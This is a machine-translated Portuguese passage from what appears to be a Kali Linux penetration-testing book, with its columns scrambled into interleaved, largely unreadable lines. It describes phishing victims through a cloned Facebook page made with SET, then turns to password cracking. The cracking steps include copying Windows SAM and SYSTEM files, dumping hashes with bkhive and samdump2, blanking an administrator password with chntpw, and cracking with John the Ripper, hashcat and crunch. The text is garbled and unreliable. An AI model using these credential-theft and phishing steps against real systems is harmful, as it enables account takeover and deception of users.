O prximo passo direcionar os Sistema Linux em execuo SET, ou resposta de um servidor web. ambiente. Nos prximos captulos,
usurios para o site falso. Uma voc pode ver que a senha MITM Proxy pode permitir que um vamos examinar outros tipos de
maneira comum de fazer isso capturada. verificador da penetrao para proxies, no entanto, o
enviando um e-mail falso tambm [142] examinar os ataques de forma rpida razo gostamos MitM Proxy porque
conhecido como phishing e-mail. SET e uma maneira fcil como verificador
pode automatizar isso para Captulo 4 ver o que solicitaes e respostas so da penetrao voc pode
voc, mas para este exemplo, ns Alm do registo directo, SET ir gerar provenientes de navegador web. ferramentas de ataque de ensaio por
decidimos faz-lo manualmente. O um relatrio do incidente, de modo MITM Proxy t-los conectados diretamente em sua
prximo exemplo mostra um que o pode ser lanado, indo para Barrilha caixa de Kali Linux.
falso e-mail usando o nosso link atacante pode aproveitar as |Sniffing / Spoofing |Sniffers Web e Hospedar digitalizao
Facebook clonado. Quando o usurio credenciais roubadas em um selecionando mitmproxy. Um mtodo comum para acesso a
clica no link www. momento posterior. [143] sistemas de host de identificar e
facebook.com, eles sero enviados Ao utilizar ferramentas como o SET explorar
para o nosso site falso em para atacar clientes, importante para Ataques do lado do cliente vulnerabilidades no sistema
facebook.secmob.net. um verificador da penetrao recomendado usar MITM Proxy operacional, os aplicativos instalados,
[141] para entender o comportamento dos quando a criao de um ataque SET, e outros programas.
clientes. Uma das maneiras mais como Ferramentas como Nessus so
Ataques do lado do cliente eficientes de fazer isso bem como quando se analisa o mtodos para avaliar os sistemas de
Voc pode ver na imagem seguinte usando um servidor proxy para comportamento de ataque. Voc deve conhecido automatizado
pgina clonada parece com o examinar e pedidos de interceptao executar SET vulnerabilidades. Esta seo ir cobrir
Facebook, mas da web. e Proxy MITM ao mesmo tempo em a forma de instalar e executar o
o URL no realmente Facebook. O Em Captulo 6, ataques na Web, um ambiente de teste. Nessus contra um alvo
ataque assume a vtima no vai notar vamos olhar para Proxies com muito Uma vez procurao MitM sistema. Ferramentas Explorao
a mais detalhes, no entanto, carregado, voc ter que apontar o abordados Captulo 3, os ataques do
ligeiramente diferente URL, que por ainda importante para aprender a navegador do seu cliente para o lado do servidor, pode ser usado para
isso que ataques de phishing reais analisar a forma como o cliente se seu servidor de Kali. MITM exibir as tirar vantagem das vulnerabilidades
usar domnios semelhantes comporta ao usar web transaes que ocorrem no identificadas pelo Nessus.
o site real. ataques como o uso de SET como solicitaes da Web [144]
Quando a vtima entra em seu nome pargrafo anterior descrito. do lado do cliente, como mostrado na
no site falso, SET ir redirecionar o MitM Proxy imagem seguinte: Captulo 4
usurio MITM Proxy uma grande ferramenta Haver um registro de todas as Hospedar digitalizao com Nessus
para o site real. Na maioria dos casos, para um verificador da penetrao atividades do navegador passando por O Nessus no vm pr-instalados com
os usurios podero digitar sua senha para examinar o cliente cliente. Embora MITM Kali. Voc vai precisar de obter
uma segunda vez sobre o real vulnerabilidades. Ele permite que o Proxy no utilizado como um registro
local e ser registrado no site, sem administrador para examinar a componente activo num teste tpico de cdigo de Defensvel usar Nessus.
nunca perceber que eles foram conexo HTTPS, parada, penetrao da web, que um Defensvel d uma opo de
atacados. Na Kali examinar e responder trfego. MITM tima ferramenta para usar quando alimentao de casa, mas limitada
Proxy permite que um administrador configurar e testar SET antes de usar
para alterar o pedido o pacote em um ao vivo
para a digitalizao de 16 endereos tar-xzvf control.tar.gz certificado. Depois de algumas telas estamos escolhendo digitalizao em
IP. Se voc gostaria de digitalizar mais ar vx Nessus-5.2.1-debian6 *, iniciais de auto-explicativo, voc ser rede externa.
IPs, voc deve comprar um tar-xzvf data.tar.gz solicitado a digitar [148]
rao profissional de sustentvel. tar-xzvf control.tar.gz o cdigo de ativao e baixar as
Nessus HomeFeed est disponvel Haver agora uma etc diretrio e uma ltimas plugins. Captulo 4
apenas para uso pessoal e no optar diretrio. [146] Se o Digitalizao guia no estiver
comercial. Se voc vai [145] disponvel, voc tambm pode
usar o Nessus no seu local de Captulo 4 selecionar Modelos de Digitalizao
trabalho, voc deve comprar Nessus Ataques do lado do cliente Voc tambm vai definir um nome de e Nova digitalizao para criar uma
ProfessionalFeed. 3. Copie o nessus diretrio / Tmp / opt usurio e senha que ser usada para nova verificao.
Para obter um cdigo de ativao para / ao / Opt diretrio, fazer o / gerenciar o Nessus Depois de selecionar Criar
ir para o Nessus optar diretrio se ele no existir. Emita aplicao. As imagens abaixo Digitalizao, a digitalizao vai lanar
http://www.tenable.com/products/ os seguintes comandos: mostram a criao de uma conta e no horrio agendado. O padro
nessus / nessus-HomeFeed. mkdir / opt (Voc pode obter um erro fornecer a cronograma ser executado de
O Nessus no vem pr-carregado com informando o diretrio / opt existe cdigo de ativao por e-mail por imediato, por isso, na maioria dos
Kali e ter de ser instalado. Voc ir no entanto, passar para o prximo Tenable depois de registrar: casos, o exame vai comear a
precisa baixar e instalar o Nessus. comando). [147] funcionar imediatamente.
No h uma verso especfica para cp-rf / <installed folder> / opt / nessus / Aps a verificao for concluda, os
Kali Linux, opt Ataques do lado do cliente resultados podem ser vistos clicando
mas a verso Debian 6.0 funciona cp-rf / <installed folder> / etc / init.d / Download inicial dos plugins pode no Resultados guia.
bem. nessus * / etc / init.d levar algum tempo, portanto seja Isto ir fornecer ao administrador um
1. Baixe Nessus para o Debian. Ir para 4. Voc pode excluir o contedo de paciente. relatrio do que o Nessus encontrado.
o site http://www.tenable.com/ download do Nessus / Tmp diretrio. Uma vez que todas as atualizaes [149]
products / nessus / select-seu-sistema 5. Para iniciar o Nessus, emita o foram baixadas e inicializado, voc
operacional baixar Nessus seguinte comando: ser apresentado Ataques do lado do cliente
para o Debian 64 bits. / Etc / init.d / start nessusd com tela de login. Use o nome de Podemos examinar os exames
Note-se que quando voc baixar o 6. Log para a interface de usurio e senha que voc definiu concludos, bem como quaisquer
Nessus, voc pode copi-lo para o / gerenciamento Nessus. Abra um durante a resultados obtidos at o momento, em
Tmp navegador e navegue instalao inicial. qualquer
diretrio. Se voc introduzir estes para https://127.0.0.1:8834. Para iniciar a digitalizao, clique no varreduras ativas, como mostra a
comandos a partir de outro diretrio, Usando o Nessus Digitalizao guia na faixa de opes imagem a seguir:
voc A primeira vez que voc entrar no superior e selecione New Scan. Voc Como um verificador da penetrao,
ser necessrio ajustar os comandos. Nessus, voc ser saudado com ir voc quer prestar ateno a quaisquer
Instalando o Nessus em Kali algumas mensagens de boas vindas, ento ser solicitado a digitar os vulnerabilidades.
2. V para o diretrio onde voc e um aviso SSL ir aparecer detalhes do alvo. Voc tambm ser Vulnerabilidades identificadas pelo
baixou o Nessus e emitir o permitindo que voc saiba que voc solicitado a selecionar o que seu patch ou vulnerabilidade
os seguintes comandos: est se conectando a uma auto- modelo que voc gostaria de usar. referncia Microsoft
ar vx Nessus-5.2.1-debian6 * assinado Nessus tem alguns modelos
tar-xzvf data.tar.gz integrados. Neste exemplo,
nmero pode ser pesquisada no Quebra de senha por definio, a um nmero reduz drasticamente o Hbrido: Combinando dicionrio com
mbito Metasploit usar um exploit em recuperao de senhas a partir de nmero de resultados possveis de um fora bruta
um dados que tem sido hacker As senhas devem ser armazenados
alvo host. Consulte Captulo 3, os armazenados ou transmitidos por um precisa para tentar quebrar uma de modo que os sistemas possam
ataques do lado do servidor, sobre sistema de computador. As senhas senha. (Kali oferece uma ferramenta verificar a identidade de um usurio e
como utilizar o Metasploit para so usadas para proteger vrios chamada Crunch que faz acesso
mais informaes. tipos de sistema, o que temos gerando uma lista de senhas para direitos. Sistemas no armazenar
O exemplo anterior mostra algumas abordadas no Captulo 3, os ataques este tipo de ataque extremamente senhas em arquivos de texto simples,
vulnerabilidades extremamente do lado do servidor, enquanto fcil). por razes bvias de segurana.
perigosas (no atacar servidores web. [151] A maioria dos sistemas no usam
se preocupe, ns voltamos e corrigido Os sistemas host so geralmente criptografia como o nico meio para
dos sistemas). Todas estas baseados em Linux e Windows ou ter Ataques do lado do cliente proteger senhas, porque um
vulnerabilidades pode ser caractersticas especficas Um verificador da penetrao chave necessria para desencriptar,
usada para explorar um sistema a respeito de como eles armazenar e experiente deve usar tcnicas de o que representa uma fraqueza de
usando Metasploit ou outras proteger senhas de usurios. Esta reconhecimento apresentados em proteger os arquivos criptografados.
ferramentas de ataque. Para mais seo se concentrar Captulo Hashing Foi inventado como um meio
informaes sobre a explorao em rachar arquivos de senha do 2, reconhecimento, para identificar os para transformar uma chave ou senha,
vulnerabilidades encontradas pelo sistema host. Ns inclumos isso no tipos de sistema, possveis polticas geralmente aritmtica,
Nessus, consulte Metasploit em Aplicao Web de senha, as pessoas envolvidas para um valor completamente
Captulo 3, os ataques do lado do Teste de Invaso livro, porque os com os sistemas de administrao e diferente. Hash irreversvel e produz
servidor. sistemas de acolhimento um cliente outras informaes que ajudam a o mesmo
[150] autorizado comum diminuir a valor para uma chave inserida, o que
aplicaes web. Comprometer um possibilidades necessrias para significa um hash podem ser
Captulo 4 cliente significa abrir uma porta de quebrar uma senha. armazenados e verificados contra um
Nessus oferece opes para exportar acesso a um alvo Existem algumas formas hackers introduzido uma senha para verificar a
detalhes sobre as vulnerabilidades aplicao web. quebrar senhas. Estes so listados autenticidade. Mudando um fator,
identificadas. Voc pode O mtodo mais fcil de obter senhas como se segue: como fazer uma carta
resultados de exportao como HTML, de usurios por meio de engenharia de capital ou adicionar um espao,
CSV, PDF, e muitos outros tipos de social. Como gera uma sada de hash
arquivos comuns. Para exportar descrito anteriormente, um hacker completamente diferente.
resultados, v para o Resultados poderia obter senhas ou pistas de Os hashes podem ser brute-forados
seo e selecionar uma varredura como senhas Adivinha: Acho manualmente usando como uma senha se voc sabe a
completa. A terceira aba na so criados, colocando como um informaes obtidas sobre um alvo frmula para a gerao de
esquerda oferece opes para sujeito autorizado. Por exemplo, a Ataque de dicionrio: Use um ataque um Hash. Muitas ferramentas de
exportar scans, como mostrado nas identificao de que todos automatizado que tenta todos os quebra de senhas, como John the
duas imagens seguintes: senhas devem ter entre 6-10 possveis Ripper capaz de
Nessus Exportao de digitalizao caracteres, comear com uma letra palavras do dicionrio detectar um hash e de fora bruta
Obteno e rachaduras senhas de maiscula e termina com Brute-force: Tente todas as ataca todas as combinaes de sada
usurios combinaes possveis de caracteres de hash com
sadas de hash gerado Microsoft tem tido uma estrada Um lugar comum para encontrar uma 2. Roubando a SAM e SISTEMA
automaticamente. Uma vez que uma rochosa sobre senhas que protegem. SAM arquivo est no C: \ urticria (C: \ <systemroot> \ sys32 \
correspondncia for encontrada, John O actual <systemroot> \ repair pasta. config).
the Ripper ir imprimir Os produtos da Microsoft so muito A cpia de segurana SAM arquivo 3. Recuperando-se a chave de
a senha de texto simples usado para mais seguras do que as verses mais criado por padro e, normalmente, inicializao do SISTEMA colmeia
gerar o hash correspondente. antigas, no entanto, eles so no excludos pelo sistema usando bkreg ou bkhive.
Tabelas do arco-ris o pior ainda vulnervel a ataques de muitas administradores. O arquivo de backup 4. Despejar os hashes de senha.
adversrio para algoritmos de hash ferramentas oferecidas em Kali. est desprotegido, mas comprimido, o 5. Quebr-las off-line com uma
comuns. Arco-ris Windows armazena senhas na SAM que significa que voc ferramenta como o John the Ripper.
tabelas so uma base de dados pr- (Sistema Gesto de Contas) registro deve descompactar o arquivo para [153]
calculado de todas as sadas de hash arquivo. A exceo a isso quando obter os arquivos de hash. Voc pode
que podem ser pesquisados Active Directory usado. Um Active usar o utilitrio de expandir-se para Ataques do lado do cliente
para identificar uma sada de hash. Directory fazer isso. O comando Expandir Note que se voc acessar um arquivo
Sites como um sistema de autenticao separado [FILE] [DESTINO]. Aqui est um no Windows, voc modificar o MAC
www.freerainbowtables.com oferta que armazena senhas em um banco exemplo de (modificar,
verses para os algoritmos de hash de dados LDAP. O SAM expanso do SAM arquivo para o acesso e mudana), que a forma
populares, tais como MD5 arquivo est localizado em C: \ descomprimida SAM arquivo. como o Windows registra sua
encontrados na maioria dos sistemas <systemroot> \ sys32 \ config. C: \> expandir SAM presena. Para evitar
Windows. O SAM arquivo armazena as senhas uncompressedSAM deixando evidncias forenses,
Kali tambm oferece aplicaes como em um formato de hash usando o LM Para aumentar a segurana de recomenda-se a copiar o host de
RainbowCrack usado para gerar as e NTLM de hash hackers desligada, Microsoft Windows destino
tabelas do arco-ris. para aumentar a segurana para o 2000 e sistema antes de lanar ataques.
Salga um hash foi criado como uma arquivo protegido. O SAM arquivo no verses mais recentes incluem um Montagem do Windows
forma de combater as tabelas do arco- pode ser movido ou copiado enquanto SYSKEY utilidade. O SYSKEY Existem ferramentas disponveis para
ris, adicionando Windows est em execuo. O SAM utilitrio criptografa o hash a captura do Windows SAM e
pedaos personalizados adicionais arquivo pode ser despejado, exibindo senhas no SAM arquivo usando a SYSKEY arquivos. Um
para mudar a sada de um hash para os hashes de senha chave de criptografia de 128 bits, que mtodo para capturar esses arquivos
algo no encontrado que pode ser movido fora do ar por um diferente a montagem do sistema de destino
em tabelas comuns do arco-ris. uma ferramenta de fora bruta de chave para cada instalao. do Windows para que o
Infelizmente, muitos sistemas, como o crack. Um hacker tambm pode obter Um invasor com acesso fsico a um outras ferramentas podem acessar
Windows fazer o sistema Windows podem obter o esses arquivos, enquanto a Microsoft
no usar hash salgado. SAM arquivo inicializando um sistema SYSKEY Windows no est em execuo.
[152] operacional diferente, montagem C: \, (Tambm chamada a tecla de O primeiro passo consiste em usar o
Iniciar uma distribuio Linux em arranque), usando os passos fdisk-l comando para identificar suas
Captulo 4 um disco (como Kali), ou arrancar a seguintes: parties. Voc deve
As senhas do Windows partir de uma unidade de CD / 1. Iniciando um outro sistema identificar o Windows e tipos de
Windows o sistema operacional disquete. operacional (como Kali). partio. O fdisk resultado mostra uma
mais utilizado por empresas no mundo partio NTFS,
todo. como se segue:
Blocos Dispositivo Boot Incio Fim Captulo 4 Kali oferece diversos utilitrios para hashes e senhas criptografadas,
Sistema Id bkreg e bkhive so ferramentas burlar a segurana da senha. tornando
/ Dev/hdb1 * 1 2432 19535008 + 86 populares que podem obter a Bootkey Ferramentas de quebra de senha o processo mais fcil para os
NTFS apresentar, como mostrado na pode testadores de penetrao. Atacantes
/ Dev/hdb2 2433 2554 979965 82 tela a seguir: ser encontrado em Ataques senha e como a ferramenta, pois muito
Linux swap / Solaris Sistemas host Linux no so to divide-se em ferramentas utilizadas customizvel e pode ser configurado
/ Dev/hdb3 2555 6202 29302560 83 comuns como o Windows e para off-line e on-line em uma variedade de maneiras
Linux representam um desafio diferente ataques. Esta seo ir focar em diferentes de acelerao
Crie um ponto de montagem utilizando para a obteno de acesso root. ferramentas utilizadas para sistemas quebra de senha.
o comando mkdir / mnt / windows. Muitos sistemas podem ter as senhas host de compromisso durante uma Algumas personalizaes podem no
Monte o sistema do Windows usando armazenadas em claro aplicao Web Penetration Test. H estar disponveis em Johnny.
o comando como mostrado no quando auto-login est habilitado, outras ferramentas disponveis no Recomenda-se o
exemplo a seguir: como o . Netrc arquivos usados para Kali, como ferramentas verso de linha de comando, John the
mount-t <WindowsType> <Windows Telnet e FTP. Para projetado para quebrar senhas de Ripper, para a maioria dos ataques.
partition> / mnt / windows a maioria dos ataques, voc vai querer protocolos sem fio, no entanto, que John the Ripper funciona da seguinte
Agora que o seu alvo do sistema capturar o passwd e sombra arquivos est fora do escopo maneira:
Windows montado, voc pode copiar armazenados comumente neste texto.
o SAM e em / Etc / passwd e / Etc / shadow. [155]
SISTEMA arquivos em seu diretrio O sombra arquivo pode ser lido
ataque usando o seguinte comando: apenas pelo root e, normalmente um Ataques do lado do cliente
cp SAM SYSTEM / pentest / hash MD5. O sombra Note-se que John a linha de comando
passwords / AttackDirectory arquivo mais difcil de entender do Ripper e Hydra estavam cobertos de
Existem ferramentas disponveis para que uma janela de SAM arquivo. Captulo 3, os ataques do lado do As tentativas de cracking de senhas
despejar o SAM arquivo. PwDump e Existem mtodos de captura servidor. com palavras de dicionrio
Caim e Abel o sombra arquivo usando Johnny Usa dicionrio palavras com
so apenas alguns exemplos. Kali carregadores de inicializao como Johnny uma interface grfica para o caracteres alfanumricos e anexado
ofertas samdump mostrado, na seo larva. John muito popular a ferramenta preconfinado
de ferramentas de senha Quebrando uma senha Linux similar quebra de senha Ripper. Ns Coloca dicionrio palavras juntas
deste captulo. a outros sistemas, como o Windows. A cobriu a verso de linha de comando Adiciona caracteres alfanumricos
Note que voc vai precisar para maioria tradicional de John the Ripper para combinar palavras
recuperar tanto o Bootkey e SAM hbridas automatizado programas de Captulo 3, Servidor- Executa palavras de dicionrio com
arquivos. cracking, como John the Ripper pode Ataques laterais. Tal como a verso caracteres especiais misturados
O Bootkey arquivo usado para identificar o tipo de linha de comando, Johnny tem Quando tudo mais falhar, as tentativas
acessar o SAM arquivo. Ferramentas de haxixe e ataque de fora bruta a vrios mecanismos que permitem de fora bruta.
utilizadas para acessar o sombra senhas com o dicionrio ele para quebrar diferentes tipos de Para usar Johnny, v para Ataques
SAM arquivo exigir a Bootkey direita. senhas, incluindo senhas senha |Ataques offline e selecione
arquivo. Senhas Linux criptografadas e hash. Johnny.
[154] Kali quebra de senha ferramentas Johnny tem a capacidade de detectar
automaticamente a maioria dos
Clique em Abrir Arquivo de senhas e manualmente / Pentest / passwords / mltiplas hashes e listas de senhas isso, porque simples de usar e inclui
selecione o arquivo de senha que john / john. Kali 1.0 padro / durante uma sesso de ataque nico. a exibio o cdigo de linha de
deseja crack. user / sbin / john. O hashcat / comando no
A figura a seguir mostra um sombra O Sada guia mostra o que Johnny utilitrios oclHashcat oferecem muitas janela inferior.
arquivo com os usurios BOB, mary, e est atacando. Voc tambm vai opes de ataque, como a fora bruta, [160]
joey encontrar erro combinador,
como os alvos. mensagens e atualizaes sobre o dicionrio, hbrido, mscara, e os Captulo 4
[156] status de uma sesso de ataque. O ataques baseados em regras. samdump2 um utilitrio que despeja
exemplo a seguir [159] os hashes de senha do Microsoft
Captulo 4 mostra uma mensagem que apresenta Windows a partir de
O Senha guia ser preenchida como Johnny identificar o tipo de hash: Ataques do lado do cliente umaSAM ficheiro de modo a que eles
Johnny rachaduras as senhas. John the Ripper e listas de palavras- BackTrack oferece muitas verses de possam ser quebrada por uma
Johnny tem guias de configurao no padro da sua interface grfica hashcat encontrado em Privilege ferramenta desligada. Para as verses
lado esquerdo. O Opes guia onde muito limitada. Ns Escalation mais recentes do
voc seleciona recomendamos o uso de uma lista |Ataques senha |Ataques offline. O cl Windows, voc vai precisar de uma
o tipo de ataque. A figura a seguir maior, que pode ser encontrada "ocl", ou aberto, aberto ferramenta para capturar o SYSKEY
mostra uma definio do padro atravs de pesquisa on-line. Para usar implementao de unificar os drivers Arquivo (chave de inicializao) para
comportamento e as opes para um da Nvidia e ATI GPU. Algumas acessar os hashes armazenados no
selecionar o tipo de hash. Deteco wordlist costume, v para o Opes verses podem SAM base de dados.
automtica de Johnny guia e selecione Modo Wordlist. no funcionar mesmo depois de samdump2 pode ser encontrado em
normalmente 90 por cento correto. Navegue at o seu atualizar BackTrack. Pode ser Ataques senha |Ataques offline
[157] lista de palavras personalizada e necessrio fazer o download da |samdump2.
clique em Aplicar. atualiza Quando voc abre samdump, Um
Ataques do lado do cliente [158] verses de www.hashcat.net. Terminal janela pop-up.
O Estatstica guia exibe quanto tempo Para usar hashcat, abra o aplicativo samdump2
Johnny tem funcionado uma sesso Captulo 4 hashcat ou navegue at Ataques Voc deve montar o seu alvo de
ativa. Johnny vai preencher as clulas de senha sistema do Windows, de modo que
O Configuraes guia especifica como senha ao lado de nomes como senhas |Ataques offline |hashcat. samdump pode acessar o SAM
Johnny ser executado, como esto rachados. O Para usar hashcat em um documento, arquivo.
mostrado no exemplo a seguir: imagem seguinte mostra dois dos trs tipo hashcat [opes] hashfile Em seguida, copie o SAM e SISTEMA
Note-se que as configuraes padro senhas rachado: [WORDFiles | diretrios. O exemplo a arquivos em seu diretrio ataque.
para o caminho para John the Ripper hashcat e oclHashcat seguir mostra hashcat a execuo de cp do sistema SAM / root /
pode no ser hashcat e oclHashcat so utilitrios um AttackDirectory
correta. Certifique-se de verificar o cracker de senha. oclHashcat um lista de palavras contra um sombra Navegue at o diretrio ataque e
caminho para John the Ripper sob GPGPU- arquivo: emisso bkhive bootkey SISTEMA
Configuraes. verso baseada. Os utilitrios hashcat hashcat oferece uma interface grfica, para se obter o
Em verses mais antigas do / oclHashcat so ferramentas que bem como, que funciona como um bootkey. Copie o bootkey em um
BackTrack, descobrimos que voc tem podem lidar com multithread frontend para o CLI. Algumas pessoas arquivo de texto para que samdump
que atualizar o caminho gostam tem o SAM arquivo com
bootkey. O SAM arquivo geralmente est Neste exemplo, temos digitado Captulo 4
cd / root / AttackDirectory> localizado sob / chntpw-u "Administrador" SAM, e Ophcrack
windowshashfiles.txt Windows/System32/config. Voc vai temos a Ophcrack um cracker de senha do
Executar samdump usando o precisar de seguinte menu: Windows com base em tabelas do
samdump SAM bootkey comando. para navegar no Terminal tela para Agora temos a opo de limpar a arco-ris. Kali oferece uma CLI
Copie a sada este diretrio. Em seu sistema, pode senha, alterar a senha, ou e verso GUI. Ophcrack pode importar
em um segundo arquivo de texto. parecer promovendo o usurio administrador. hashes de uma variedade de
Samdump2 SAM bootkey> algo como isto: Alterando a senha nem sempre formatos, incluindo
windowshashfiles2.txt / funciona despejo diretamente do SAM arquivos
Agora, use uma ferramenta de quebra Media/hda1/Windows/System32/config em sistemas Windows 7, por isso do Windows. O seguinte mostra
de senha, como John the Ripper para Cada sistema pode ser ligeiramente recomendamos limpar a senha. Ao imagem de tela
quebrar os hashes! diferente. Neste exemplo, Kali parece fazer isso, voc alguns dos formatos disponveis para
chntpw estar a usar o ser capaz de entrar no sistema alvo carregar em Ophcrack:
chntpw uma ferramenta on Kali nmero de srie do meu disco rgido com uma senha em branco. Ophcrack vem com built-in tabelas do
Linux, Backtrack, e outras como a localizao do dispositivo. Isso [163] arco-ris, como mostrado no exemplo
distribuies Linux que redefine porque eu tenha inicializado a seguir. Ns
senhas locais no Windows 8 e verses de uma mquina virtual Windows 7 Ataques do lado do cliente recomendvel carregar as tabelas
anteriores do Windows. Ele modifica o com o Live CD do Kali. O SAM base Para acessar chntpw, V para o mais recentes do arco-ris ao invs de
Banco de dados de senha do de dados geralmente Ataques senha |Ataques offline usar as tabelas padro.
Windows. Esta ferramenta utilizada no / Media / name_of_hard_drive / |chntpw. ATerminal [165]
principalmente para a obteno no Windows/System32/config. janela se abrir, mostrando a tela de
Windows [162] boas-vindas para chntpw. Existem Ataques do lado do cliente
caixas quando voc no sabe a alguns Tabelas do arco-ris esto disponveis
senha. Captulo 4 maneiras de usar chntpw, como a partir de fontes online, como o site
[161] A captura de tela a seguir lista o SAM descrito na pgina de destino principal do desenvolvedor
arquivo de banco de dados no meu da seguinte forma: http://ophcrack.sourceforge.net/tables.
Ataques do lado do cliente disco rgido: Para usar o modo interativo, tipo php.
Para usar chntpw, Arrancar a mquina O comando chntpw-l SAM ir listar chntpw-i eo caminho para o SAM Para acessar ophcrack, ir a Ataques
Windows com o Live CD do Kali. Para todos os nomes de usurios que esto arquivo. Se o destino senha |Ataques offline e selecione o
baixar contidos em um sistema montado, voc ter de CLI ou verso GUI. Clique em Carga,
Kali Linux, v para o o sistema Windows. A figura a seguir especificar a localizao da SAM e selecione o caminho para o arquivo
http://www.kali.org/downloads/ e mostra o resultado da execuo do arquivo dentro do que voc deseja quebrar
baixar a imagem ISO. comando chntpw-l SAM: diretrio montado. (Por exemplo, um Windows SAM
Queime o ISO em um CD e iniciar a O comando d-nos uma lista de Um menu ir aparecer oferecendo arquivo).
mquina Windows com o CD ao vivo. nomes de usurios no sistema. opes para alterar o SAM arquivo. [166]
Na inicializao Quando temos a Voc pode selecionar
menu para Kali, selecione Forensics username queremos modificar, opo 1em branco a palavra-passe. Captulo 4
opo. corremos o comando chntpw-u [164]
"username" SAM.
Para este exemplo, foi utilizado o Kali Crunch tem caracteres especiais que Agora o arquivo de texto tem todas as dictstat um utilitrio de script Python
ISO em uma mquina Windows e se traduzem para o seguinte: letras minsculas e nmeros, como utilizado para anlise dos resultados
inicializado em Kali mostrado na de cracking de senha ou para
Forensics modo. Ns ler a / seguinte exemplo: uma anlise wordlist regular. dictstat
Windows/system32/config diretrio Outras ferramentas disponveis no Kali ir analisar os resultados e fornecer
para chegar ao Existem outras ferramentas teis mscaras para
o SAM base de dados. Voc pode @: Insere caracteres minsculos encontrados em Kali. Ns limitamos a -bruta forando combinaes de
aprender mais sobre como usar Kali %: Os nmeros de inseres lista de utilitrios que senha que j foram quebrados. Esta
Linux no Forensics modo ,: Caracteres maisculos Inseres auxiliar comprometer sistemas host vontade
em Captulo 7, contramedidas ^: Smbolos Inseres que acessam servidores de aplicativos provvel fornecer pistas para rachar
defensivas, deste livro. Voc tambm Para este exemplo, vamos supor que web. Tem mais hashes em grupo. Isto pode ser
pode usar uma cpia offline conhecemos nossos usos alvo passar outras ferramentas de quebra de til
do SAM banco de dados diretamente seguido por dois senhas disponveis em Kali no quando o direcionamento de uma
com Kali. caracteres desconhecidos em sua mostradas nesta lista, no entanto, o empresa com uma poltica de senha.
[167] senha. Para executar Crunch para foco dessas ferramentas est fora do A figura a seguir
uma senha de seis caracteres escopo deste texto. mostra o dictstat tela inicial:
Ataques do lado do cliente tendo passagem seguido de dois Hash-identificador um utilitrio [171]
Voc dever ver o hash com o nome nmeros desconhecidos, uso %% Python usado para identificar os tipos
de usurio e ID de usurio. Clique no para representar qualquer nmero. de hash. Mais password Ataques do lado do cliente
Fenda boto Para executar este e colocar a sada ferramentas de cracking, como John Para executar dictstat, Tipo dictstat
e esperar para a senha. em um arquivo de texto chamado the Ripper incluir uma funo de [opes] passwords.txt. A sequncia
Crunch newpasswordlist.txt, Utilizar o deteco automtica para hashes imagem mostra um exemplo do uso
Crunch uma ferramenta usada para exemplo de entrada: que so muito bons e provavelmente dictstat:
gerar listas de senhas. Isto pode ser O arquivo de texto de sada conter 90 por cento preciso. Esta utilidade RainbowCrack o programa de
extremamente til se voc todas as possveis combinaes de pode ser utilizado para quebra de hash que gera tabelas do
so capazes de reunir informaes nmeros. A sequncia verificar um tipo de hash arco-ris para ser
sobre a forma como o seu alvo cria imagem mostra a parte superior do manualmente. Para usar Hash- usado em quebra de senha.
senhas. Por exemplo, se arquivo de sada: identificador, execute o utilitrio e RainbowCrack diferente do que a
voc capturar duas senhas e observe [169] col-lo em fora bruta padro
o alvo usa uma fase seguido por uma cpia do hash. abordagem usando grandes tabelas
acaso Ataques do lado do cliente [170] pr-computadas para reduzir o
dgitos, triturao pode ser utilizada Para adicionar todas as letras Hash-identificador perodo de tempo necessrio para
para gerar rapidamente uma lista de minsculas, use triturar 6 6-t quebrar uma senha. RainbowCrack
que frase seguido por todo o passagem seguido pela @ @ Captulo 4 uma aplicao decente, no entanto, h
possveis dgitos aleatrios. representando A figura a seguir mostra uma sada de muitos
[168] todas as letras minsculas, como um hash: Rainbow Tables gratuitos disponveis
mostrado no exemplo a seguir: dictstat para download, como
Captulo 4 www.freerainbowtables.com.
A figura a seguir mostra a Resumo Muniz um funcionrio do governo, comum que a autenticao do
RainbowCrack tela inicial: Os sistemas host so uma fonte bem como o seu laptop emitido pelo usurio envolve o uso de um nome de
RainbowCrack (rcracki_mt) autorizada que acessar aplicaes governo usurio e senha
[172] web. Comprometedor agncia. Como um verificador da combinao. Torna-se complicado
um recurso autorizado poderia dar um penetrao, valioso para ser capaz para um usurio para inserir essas
Captulo 4 verificador da penetrao aprovado de ganhar a confiana de um sistema informaes a cada
findmyhash acesso a um alvo de tempo de autenticao necessria.
findmyhash um script Python, que aplicao web. Este conceito muitas e segurana de bypass como uma Para superar isso, single sign-on foi
usa um servio online gratuito para vezes esquecido quando Teste de entidade autorizada. criado como um
quebrar hashes. Invaso O Certified Information Systems significa para autenticar uma a uma
Voc deve ter acesso Internet antes aplicaes web. Security Professional Currculo autoridade central que tem a
de usar esta ferramenta. A figura a Neste captulo, abordamos vrios (CISSP) confiana de outros sites.
seguir mtodos para obter acesso no classifica a autenticao baseada em A autoridade central ir verificar a
espetculos findmyhash a execuo autorizado ao anfitrio trs tipos de fator, como segue: confiana em nome do usurio ou
de um hash MD5 contra vrios sites: sistemas. O foco est usando dispositivo, de modo que o usurio
phrasendrescher um passe frase engenharia social, identificando os pode
processamento multi-modular e hosts vulnerveis e acesso mltiplo sistemas protegidos,
rachaduras ferramenta. rachaduras senhas. H muitos livros Algo que voc sabe, como um PIN ou sem ter que ser solicitado em cada
phrasendrescher vem com uma srie disponveis que incidem sobre hacking palavra-passe segurana
de plugins, bem como API que permite anfitrio Algo que voc tem, como um carto gateway. A autoridade comum de
desenvolvimento de novos plugins. sistemas, que poderiam ser teis inteligente confiana um controlador de
phrasendrescher quando alavancado com os temas Algo que voc , como uma domnio do Windows, fornecendo
CmosPwd abordados neste livro. impresso digital autenticao para usurios internos
CmosPwd usado para quebrar a Ns limitado o escopo deste captulo O mtodo mais comum pelo qual as para recursos da intranet. Em tais
BIOS (Bsico Input Output System) para a segmentao de hosts, pessoas confirmar a sua identidade casos, comprometendo
senha. especificamente, que o acesso web est usando algo uma autoridade confivel ou uma
CmosPwd permite apagar / kill, aplicaes. eles sabem, como uma senha. Ns conta com privilgios elevados pode
backup e restaurar o CMOS. O prximo captulo ir cobrir atacando cobrimos vrias maneiras para significar o acesso a muitos outros
[173] como anfitries autenticar para quebrar senhas em recursos internos deste tipo de
aplicaes web. Captulo 4, Ataques lado do cliente, ao sistema.
Ataques do lado do cliente [174] atacar sistemas host. Rachando uma
creddump senha Atacando Autenticao
creddump uma ferramenta de Atacando Autenticao vai te dar acesso a alguns sistemas no Muitos rgos do governo alavancar
python para extrair vrias credenciais Autenticao o ato de confirmao entanto, muitos alvos ir alavancar um Verificao de Identidade Pessoal
